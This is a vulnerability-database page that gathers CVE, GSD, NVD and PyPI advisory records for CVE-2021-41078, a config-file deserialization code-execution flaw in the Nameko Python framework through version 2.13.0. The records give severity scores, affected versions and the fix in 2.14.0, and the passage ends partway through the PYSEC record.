Vulnerability-Lookup

CVE-2021-41078 (GCVE-0-2021-41078)

Vulnerability from cvelistv5 – Published: 2021-10-26 12:08 – Updated: 2024-08-04 02:59

Summary

Nameko through 2.13.0 can be tricked into performing arbitrary code execution when deserializing the config file.

Severity ?

No CVSS data available.

CWE

Assigner

mitre

References

URL

Tags

	https://github.com/nameko/nameko	x_refsource_MISC
	https://github.com/nameko/nameko/security/advisor…	x_refsource_MISC

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-04T02:59:31.054Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://github.com/nameko/nameko"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://github.com/nameko/nameko/security/advisories/GHSA-6p52-jr3q-c94g"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Nameko through 2.13.0 can be tricked into performing arbitrary code execution when deserializing the config file."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2021-10-26T12:08:19",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/nameko/nameko"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/nameko/nameko/security/advisories/GHSA-6p52-jr3q-c94g"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2021-41078",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "Nameko through 2.13.0 can be tricked into performing arbitrary code execution when deserializing the config file."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://github.com/nameko/nameko",
              "refsource": "MISC",
              "url": "https://github.com/nameko/nameko"
            },
            {
              "name": "https://github.com/nameko/nameko/security/advisories/GHSA-6p52-jr3q-c94g",
              "refsource": "MISC",
              "url": "https://github.com/nameko/nameko/security/advisories/GHSA-6p52-jr3q-c94g"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2021-41078",
    "datePublished": "2021-10-26T12:08:19",
    "dateReserved": "2021-09-15T00:00:00",
    "dateUpdated": "2024-08-04T02:59:31.054Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1",
  "vulnerability-lookup:meta": {
    "fkie_nvd": {
      "configurations": "[{\"nodes\": [{\"operator\": \"OR\", \"negate\": false, \"cpeMatch\": [{\"vulnerable\": true, \"criteria\": \"cpe:2.3:a:nameko:nameko:*:*:*:*:*:*:*:*\", \"versionEndIncluding\": \"2.13.0\", \"matchCriteriaId\": \"8F5BBB45-A5AD-4108-8EF9-BD7C71C768AB\"}, {\"vulnerable\": true, \"criteria\": \"cpe:2.3:a:nameko:nameko:3.0.0:rc1:*:*:*:*:*:*\", \"matchCriteriaId\": \"940E65AD-D9B5-498E-A68A-AAF5708B0A2A\"}, {\"vulnerable\": true, \"criteria\": \"cpe:2.3:a:nameko:nameko:3.0.0:rc2:*:*:*:*:*:*\", \"matchCriteriaId\": \"50EA538A-DDA4-4EAA-8C99-F1FF658C85A5\"}, {\"vulnerable\": true, \"criteria\": \"cpe:2.3:a:nameko:nameko:3.0.0:rc3:*:*:*:*:*:*\", \"matchCriteriaId\": \"73B0326E-5A20-4A6D-B08F-1EF3F2AD8F7A\"}, {\"vulnerable\": true, \"criteria\": \"cpe:2.3:a:nameko:nameko:3.0.0:rc4:*:*:*:*:*:*\", \"matchCriteriaId\": \"498E3DCB-E0B2-4B53-ACDE-2EADD9B829A4\"}, {\"vulnerable\": true, \"criteria\": \"cpe:2.3:a:nameko:nameko:3.0.0:rc5:*:*:*:*:*:*\", \"matchCriteriaId\": \"F7365EC9-D7F1-444B-8E80-7AD573D55DD9\"}, {\"vulnerable\": true, \"criteria\": \"cpe:2.3:a:nameko:nameko:3.0.0:rc6:*:*:*:*:*:*\", \"matchCriteriaId\": \"98A04FD0-9739-466F-8ABA-566D31E6CB43\"}, {\"vulnerable\": true, \"criteria\": \"cpe:2.3:a:nameko:nameko:3.0.0:rc7:*:*:*:*:*:*\", \"matchCriteriaId\": \"3D744B41-8F68-435A-8EF0-F5D279CE710D\"}, {\"vulnerable\": true, \"criteria\": \"cpe:2.3:a:nameko:nameko:3.0.0:rc8:*:*:*:*:*:*\", \"matchCriteriaId\": \"CEBFAD48-93C9-4C1D-BC16-B36594189B25\"}, {\"vulnerable\": true, \"criteria\": \"cpe:2.3:a:nameko:nameko:3.0.0:rc9:*:*:*:*:*:*\", \"matchCriteriaId\": \"4E9EF6FA-CDF8-4D0B-963E-7CE6EC5A25D7\"}]}]}]",
      "descriptions": "[{\"lang\": \"en\", \"value\": \"Nameko through 2.13.0 can be tricked into performing arbitrary code execution when deserializing the config file.\"}, {\"lang\": \"es\", \"value\": \"Nameko versiones hasta 2.13.0, puede ser enga\\u00f1ado para llevar a cabo una ejecuci\\u00f3n de c\\u00f3digo arbitrario cuando es deserializado el archivo de configuraci\\u00f3n\"}]",
      "id": "CVE-2021-41078",
      "lastModified": "2024-11-21T06:25:24.123",
      "metrics": "{\"cvssMetricV31\": [{\"source\": \"nvd@nist.gov\", \"type\": \"Primary\", \"cvssData\": {\"version\": \"3.1\", \"vectorString\": \"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\", \"baseScore\": 7.8, \"baseSeverity\": \"HIGH\", \"attackVector\": \"LOCAL\", \"attackComplexity\": \"LOW\", \"privilegesRequired\": \"NONE\", \"userInteraction\": \"REQUIRED\", \"scope\": \"UNCHANGED\", \"confidentialityImpact\": \"HIGH\", \"integrityImpact\": \"HIGH\", \"availabilityImpact\": \"HIGH\"}, \"exploitabilityScore\": 1.8, \"impactScore\": 5.9}], \"cvssMetricV2\": [{\"source\": \"nvd@nist.gov\", \"type\": \"Primary\", \"cvssData\": {\"version\": \"2.0\", \"vectorString\": \"AV:N/AC:M/Au:N/C:P/I:P/A:P\", \"baseScore\": 6.8, \"accessVector\": \"NETWORK\", \"accessComplexity\": \"MEDIUM\", \"authentication\": \"NONE\", \"confidentialityImpact\": \"PARTIAL\", \"integrityImpact\": \"PARTIAL\", \"availabilityImpact\": \"PARTIAL\"}, \"baseSeverity\": \"MEDIUM\", \"exploitabilityScore\": 8.6, \"impactScore\": 6.4, \"acInsufInfo\": false, \"obtainAllPrivilege\": false, \"obtainUserPrivilege\": false, \"obtainOtherPrivilege\": false, \"userInteractionRequired\": true}]}",
      "published": "2021-10-26T13:15:07.557",
      "references": "[{\"url\": \"https://github.com/nameko/nameko\", \"source\": \"cve@mitre.org\", \"tags\": [\"Third Party Advisory\"]}, {\"url\": \"https://github.com/nameko/nameko/security/advisories/GHSA-6p52-jr3q-c94g\", \"source\": \"cve@mitre.org\", \"tags\": [\"Exploit\", \"Third Party Advisory\"]}, {\"url\": \"https://github.com/nameko/nameko\", \"source\": \"af854a3a-2127-422b-91ae-364da2661108\", \"tags\": [\"Third Party Advisory\"]}, {\"url\": \"https://github.com/nameko/nameko/security/advisories/GHSA-6p52-jr3q-c94g\", \"source\": \"af854a3a-2127-422b-91ae-364da2661108\", \"tags\": [\"Exploit\", \"Third Party Advisory\"]}]",
      "sourceIdentifier": "cve@mitre.org",
      "vulnStatus": "Modified",
      "weaknesses": "[{\"source\": \"nvd@nist.gov\", \"type\": \"Primary\", \"description\": [{\"lang\": \"en\", \"value\": \"CWE-502\"}]}]"
    },
    "nvd": "{\"cve\":{\"id\":\"CVE-2021-41078\",\"sourceIdentifier\":\"cve@mitre.org\",\"published\":\"2021-10-26T13:15:07.557\",\"lastModified\":\"2024-11-21T06:25:24.123\",\"vulnStatus\":\"Modified\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Nameko through 2.13.0 can be tricked into performing arbitrary code execution when deserializing the config file.\"},{\"lang\":\"es\",\"value\":\"Nameko versiones hasta 2.13.0, puede ser enga\u00f1ado para llevar a cabo una ejecuci\u00f3n de c\u00f3digo arbitrario cuando es deserializado el archivo de configuraci\u00f3n\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\",\"baseScore\":7.8,\"baseSeverity\":\"HIGH\",\"attackVector\":\"LOCAL\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"REQUIRED\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":1.8,\"impactScore\":5.9}],\"cvssMetricV2\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"2.0\",\"vectorString\":\"AV:N/AC:M/Au:N/C:P/I:P/A:P\",\"baseScore\":6.8,\"accessVector\":\"NETWORK\",\"accessComplexity\":\"MEDIUM\",\"authentication\":\"NONE\",\"confidentialityImpact\":\"PARTIAL\",\"integrityImpact\":\"PARTIAL\",\"availabilityImpact\":\"PARTIAL\"},\"baseSeverity\":\"MEDIUM\",\"exploitabilityScore\":8.6,\"impactScore\":6.4,\"acInsufInfo\":false,\"obtainAllPrivilege\":false,\"obtainUserPrivilege\":false,\"obtainOtherPrivilege\":false,\"userInteractionRequired\":true}]},\"weaknesses\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-502\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:nameko:nameko:*:*:*:*:*:*:*:*\",\"versionEndIncluding\":\"2.13.0\",\"matchCriteriaId\":\"8F5BBB45-A5AD-4108-8EF9-BD7C71C768AB\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:nameko:nameko:3.0.0:rc1:*:*:*:*:*:*\",\"matchCriteriaId\":\"940E65AD-D9B5-498E-A68A-AAF5708B0A2A\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:nameko:nameko:3.0.0:rc2:*:*:*:*:*:*\",\"matchCriteriaId\":\"50EA538A-DDA4-4EAA-8C99-F1FF658C85A5\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:nameko:nameko:3.0.0:rc3:*:*:*:*:*:*\",\"matchCriteriaId\":\"73B0326E-5A20-4A6D-B08F-1EF3F2AD8F7A\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:nameko:nameko:3.0.0:rc4:*:*:*:*:*:*\",\"matchCriteriaId\":\"498E3DCB-E0B2-4B53-ACDE-2EADD9B829A4\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:nameko:nameko:3.0.0:rc5:*:*:*:*:*:*\",\"matchCriteriaId\":\"F7365EC9-D7F1-444B-8E80-7AD573D55DD9\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:nameko:nameko:3.0.0:rc6:*:*:*:*:*:*\",\"matchCriteriaId\":\"98A04FD0-9739-466F-8ABA-566D31E6CB43\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:nameko:nameko:3.0.0:rc7:*:*:*:*:*:*\",\"matchCriteriaId\":\"3D744B41-8F68-435A-8EF0-F5D279CE710D\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:nameko:nameko:3.0.0:rc8:*:*:*:*:*:*\",\"matchCriteriaId\":\"CEBFAD48-93C9-4C1D-BC16-B36594189B25\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:nameko:nameko:3.0.0:rc9:*:*:*:*:*:*\",\"matchCriteriaId\":\"4E9EF6FA-CDF8-4D0B-963E-7CE6EC5A25D7\"}]}]}],\"references\":[{\"url\":\"https://github.com/nameko/nameko\",\"source\":\"cve@mitre.org\",\"tags\":[\"Third Party Advisory\"]},{\"url\":\"https://github.com/nameko/nameko/security/advisories/GHSA-6p52-jr3q-c94g\",\"source\":\"cve@mitre.org\",\"tags\":[\"Exploit\",\"Third Party Advisory\"]},{\"url\":\"https://github.com/nameko/nameko\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Third Party Advisory\"]},{\"url\":\"https://github.com/nameko/nameko/security/advisories/GHSA-6p52-jr3q-c94g\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Exploit\",\"Third Party Advisory\"]}]}}"
  }
}

GSD-2021-41078

Vulnerability from gsd - Updated: 2023-12-13 01:23

Details

Nameko through 2.13.0 can be tricked into performing arbitrary code execution when deserializing the config file.

Aliases

CVE-2021-41078

Aliases

CVE-2021-41078

JSON

To clipboard

{
  "GSD": {
    "alias": "CVE-2021-41078",
    "description": "Nameko through 2.13.0 can be tricked into performing arbitrary code execution when deserializing the config file.",
    "id": "GSD-2021-41078"
  },
  "gsd": {
    "metadata": {
      "exploitCode": "unknown",
      "remediation": "unknown",
      "reportConfidence": "confirmed",
      "type": "vulnerability"
    },
    "osvSchema": {
      "aliases": [
        "CVE-2021-41078"
      ],
      "details": "Nameko through 2.13.0 can be tricked into performing arbitrary code execution when deserializing the config file.",
      "id": "GSD-2021-41078",
      "modified": "2023-12-13T01:23:27.276894Z",
      "schema_version": "1.4.0"
    }
  },
  "namespaces": {
    "cve.org": {
      "CVE_data_meta": {
        "ASSIGNER": "cve@mitre.org",
        "ID": "CVE-2021-41078",
        "STATE": "PUBLIC"
      },
      "affects": {
        "vendor": {
          "vendor_data": [
            {
              "product": {
                "product_data": [
                  {
                    "product_name": "n/a",
                    "version": {
                      "version_data": [
                        {
                          "version_value": "n/a"
                        }
                      ]
                    }
                  }
                ]
              },
              "vendor_name": "n/a"
            }
          ]
        }
      },
      "data_format": "MITRE",
      "data_type": "CVE",
      "data_version": "4.0",
      "description": {
        "description_data": [
          {
            "lang": "eng",
            "value": "Nameko through 2.13.0 can be tricked into performing arbitrary code execution when deserializing the config file."
          }
        ]
      },
      "problemtype": {
        "problemtype_data": [
          {
            "description": [
              {
                "lang": "eng",
                "value": "n/a"
              }
            ]
          }
        ]
      },
      "references": {
        "reference_data": [
          {
            "name": "https://github.com/nameko/nameko",
            "refsource": "MISC",
            "url": "https://github.com/nameko/nameko"
          },
          {
            "name": "https://github.com/nameko/nameko/security/advisories/GHSA-6p52-jr3q-c94g",
            "refsource": "MISC",
            "url": "https://github.com/nameko/nameko/security/advisories/GHSA-6p52-jr3q-c94g"
          }
        ]
      }
    },
    "gitlab.com": {
      "advisories": [
        {
          "affected_range": "\u003c=2.13.0||==3.0.0",
          "affected_versions": "All versions up to 2.13.0, version 3.0.0",
          "cvss_v2": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
          "cvss_v3": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
          "cwe_ids": [
            "CWE-1035",
            "CWE-502",
            "CWE-937"
          ],
          "date": "2021-10-29",
          "description": "Nameko can be tricked into performing arbitrary code execution when deserializing the config file.",
          "fixed_versions": [
            "2.14.0"
          ],
          "identifier": "CVE-2021-41078",
          "identifiers": [
            "CVE-2021-41078"
          ],
          "not_impacted": "All versions after 2.13.0 before 3.0.0, all versions after 3.0.0",
          "package_slug": "pypi/nameko",
          "pubdate": "2021-10-26",
          "solution": "Upgrade to version 2.14.0 or above.",
          "title": "Deserialization of Untrusted Data",
          "urls": [
            "https://nvd.nist.gov/vuln/detail/CVE-2021-41078"
          ],
          "uuid": "a92fa4f8-7041-42bc-947b-e03acdfacb03"
        }
      ]
    },
    "nvd.nist.gov": {
      "configurations": {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:nameko:nameko:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "2.13.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:nameko:nameko:3.0.0:rc1:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:nameko:nameko:3.0.0:rc2:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:nameko:nameko:3.0.0:rc3:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:nameko:nameko:3.0.0:rc4:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:nameko:nameko:3.0.0:rc5:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:nameko:nameko:3.0.0:rc6:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:nameko:nameko:3.0.0:rc7:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:nameko:nameko:3.0.0:rc8:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:nameko:nameko:3.0.0:rc9:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      },
      "cve": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2021-41078"
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "en",
              "value": "Nameko through 2.13.0 can be tricked into performing arbitrary code execution when deserializing the config file."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "en",
                  "value": "CWE-502"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://github.com/nameko/nameko/security/advisories/GHSA-6p52-jr3q-c94g",
              "refsource": "MISC",
              "tags": [
                "Exploit",
                "Third Party Advisory"
              ],
              "url": "https://github.com/nameko/nameko/security/advisories/GHSA-6p52-jr3q-c94g"
            },
            {
              "name": "https://github.com/nameko/nameko",
              "refsource": "MISC",
              "tags": [
                "Third Party Advisory"
              ],
              "url": "https://github.com/nameko/nameko"
            }
          ]
        }
      },
      "impact": {
        "baseMetricV2": {
          "acInsufInfo": false,
          "cvssV2": {
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "availabilityImpact": "PARTIAL",
            "baseScore": 6.8,
            "confidentialityImpact": "PARTIAL",
            "integrityImpact": "PARTIAL",
            "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
            "version": "2.0"
          },
          "exploitabilityScore": 8.6,
          "impactScore": 6.4,
          "obtainAllPrivilege": false,
          "obtainOtherPrivilege": false,
          "obtainUserPrivilege": false,
          "severity": "MEDIUM",
          "userInteractionRequired": true
        },
        "baseMetricV3": {
          "cvssV3": {
            "attackComplexity": "LOW",
            "attackVector": "LOCAL",
            "availabilityImpact": "HIGH",
            "baseScore": 7.8,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
            "version": "3.1"
          },
          "exploitabilityScore": 1.8,
          "impactScore": 5.9
        }
      },
      "lastModifiedDate": "2021-10-29T01:34Z",
      "publishedDate": "2021-10-26T13:15Z"
    }
  }
}

FKIE_CVE-2021-41078

Vulnerability from fkie_nvd - Published: 2021-10-26 13:15 - Updated: 2024-11-21 06:25

Severity ?

7.8 (High) - CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Summary

Nameko through 2.13.0 can be tricked into performing arbitrary code execution when deserializing the config file.

References

URL	Tags
cve@mitre.org	https://github.com/nameko/nameko	Third Party Advisory
cve@mitre.org	https://github.com/nameko/nameko/security/advisories/GHSA-6p52-jr3q-c94g	Exploit, Third Party Advisory
af854a3a-2127-422b-91ae-364da2661108	https://github.com/nameko/nameko	Third Party Advisory
af854a3a-2127-422b-91ae-364da2661108	https://github.com/nameko/nameko/security/advisories/GHSA-6p52-jr3q-c94g	Exploit, Third Party Advisory

Impacted products

Vendor	Product	Version
nameko	nameko	*
nameko	nameko	3.0.0
nameko	nameko	3.0.0
nameko	nameko	3.0.0
nameko	nameko	3.0.0
nameko	nameko	3.0.0
nameko	nameko	3.0.0
nameko	nameko	3.0.0
nameko	nameko	3.0.0
nameko	nameko	3.0.0

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:nameko:nameko:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "8F5BBB45-A5AD-4108-8EF9-BD7C71C768AB",
              "versionEndIncluding": "2.13.0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:nameko:nameko:3.0.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "940E65AD-D9B5-498E-A68A-AAF5708B0A2A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:nameko:nameko:3.0.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "50EA538A-DDA4-4EAA-8C99-F1FF658C85A5",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:nameko:nameko:3.0.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "73B0326E-5A20-4A6D-B08F-1EF3F2AD8F7A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:nameko:nameko:3.0.0:rc4:*:*:*:*:*:*",
              "matchCriteriaId": "498E3DCB-E0B2-4B53-ACDE-2EADD9B829A4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:nameko:nameko:3.0.0:rc5:*:*:*:*:*:*",
              "matchCriteriaId": "F7365EC9-D7F1-444B-8E80-7AD573D55DD9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:nameko:nameko:3.0.0:rc6:*:*:*:*:*:*",
              "matchCriteriaId": "98A04FD0-9739-466F-8ABA-566D31E6CB43",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:nameko:nameko:3.0.0:rc7:*:*:*:*:*:*",
              "matchCriteriaId": "3D744B41-8F68-435A-8EF0-F5D279CE710D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:nameko:nameko:3.0.0:rc8:*:*:*:*:*:*",
              "matchCriteriaId": "CEBFAD48-93C9-4C1D-BC16-B36594189B25",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:nameko:nameko:3.0.0:rc9:*:*:*:*:*:*",
              "matchCriteriaId": "4E9EF6FA-CDF8-4D0B-963E-7CE6EC5A25D7",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Nameko through 2.13.0 can be tricked into performing arbitrary code execution when deserializing the config file."
    },
    {
      "lang": "es",
      "value": "Nameko versiones hasta 2.13.0, puede ser enga\u00f1ado para llevar a cabo una ejecuci\u00f3n de c\u00f3digo arbitrario cuando es deserializado el archivo de configuraci\u00f3n"
    }
  ],
  "id": "CVE-2021-41078",
  "lastModified": "2024-11-21T06:25:24.123",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "MEDIUM",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 6.8,
          "confidentialityImpact": "PARTIAL",
          "integrityImpact": "PARTIAL",
          "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 8.6,
        "impactScore": 6.4,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": true
      }
    ],
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "LOCAL",
          "availabilityImpact": "HIGH",
          "baseScore": 7.8,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "REQUIRED",
          "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 1.8,
        "impactScore": 5.9,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2021-10-26T13:15:07.557",
  "references": [
    {
      "source": "cve@mitre.org",
      "tags": [
        "Third Party Advisory"
      ],
      "url": "https://github.com/nameko/nameko"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Exploit",
        "Third Party Advisory"
      ],
      "url": "https://github.com/nameko/nameko/security/advisories/GHSA-6p52-jr3q-c94g"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Third Party Advisory"
      ],
      "url": "https://github.com/nameko/nameko"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit",
        "Third Party Advisory"
      ],
      "url": "https://github.com/nameko/nameko/security/advisories/GHSA-6p52-jr3q-c94g"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-502"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

PYSEC-2021-383

Vulnerability from pysec - Published: 2021-10-26 13:15 - Updated: 2021-10-29 05:27

Details

Nameko through 2.13.0 can be tricked into performing arbitrary code execution when deserializing the config file.

Impacted products

Name	purl
nameko	pkg:pypi/nameko

Aliases

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "nameko",
        "purl": "pkg:pypi/nameko"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.14.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ],
      "versions": [
        "0.1.1",
        "0.1.2",
        "0.1.3",
        "0.1.4",
        "0.1.5",
        "0.1.6",
        "0.1.7",
        "0.1.8",
        "0.1.9",
        "0.2.0",
        "0.2.1",
        "0.3.0",
        "0.4.0",
        "0.4.1",
        "0.5.0",
        "0.5.1",
        "0.5.2",
        "0.5.3",
        "0.6.0",
        "0.7.0",
        "1.0.0",
        "1.0.1",
        "1.1.0",
        "1.1.1",
        "1.1.2",
        "1.1.3",
        "1.1.4",
        "1.10.0",
        "1.10.1",
        "1.11.0",
        "1.11.1",
        "1.11.2",
        "1.11.3",
        "1.11.4",
        "1.11.5",
        "1.12.0",
        "1.13.0",
        "1.14.0",
        "1.2.0",
        "1.2.1",
        "1.2.2",
        "1.2.3",
        "1.2.4",
        "1.2.5",
        "1.3.0",
        "1.3.1",
        "1.3.2",
        "1.3.3",
        "1.3.4",
        "1.3.5",
        "1.4.0",
        "1.4.1",
        "1.5.0",
        "1.6.0",
        "1.6.1",
        "1.7.0",
        "1.7.1",
        "1.7.2",
        "1.8.0",
        "1.8.1",
        "1.8.2",
        "1.9.0",
        "1.9.1",
        "2.0.0",
        "2.1.0",
        "2.1.1",
        "2.1.2",
        "2.10.0",
        "2.11.0",
        "2.12.0",
        "2.13.0",
        "2.2.0",
        "2.3.0",
        "2.3.1",
        "2.4.0",
        "2.4.1",
        "2.4.2",
        "2.4.3",
        "2.4.4",
        "2.5.0",
        "2.5.1",
        "2.5.2",
        "2.5.3",
        "2.5.4",
        "2.6.0",
        "2.7.0",
        "2.8.0",
        "2.8.1",
        "2.8.2",
        "2.8.3",
        "2.8.4",
        "2.8.5",
        "2.9.0",
        "2.9.0rc0",
        "2.9.1",
        "2.9.1rc0"
      ]
    }
  ],
  "aliases": [
    "CVE-2021-41078",
    "GHSA-6p52-jr3q-c94g"
  ],
  "details": "Nameko through 2.13.0 can be tricked into performing arbitrary code execution when deserializing the config file.",
  "id": "PYSEC-2021-383",
  "modified": "2021-10-29T05:27:28.492888Z",
  "published": "2021-10-26T13:15:00Z",
  "references": [
    {
      "type": "ADVISORY",
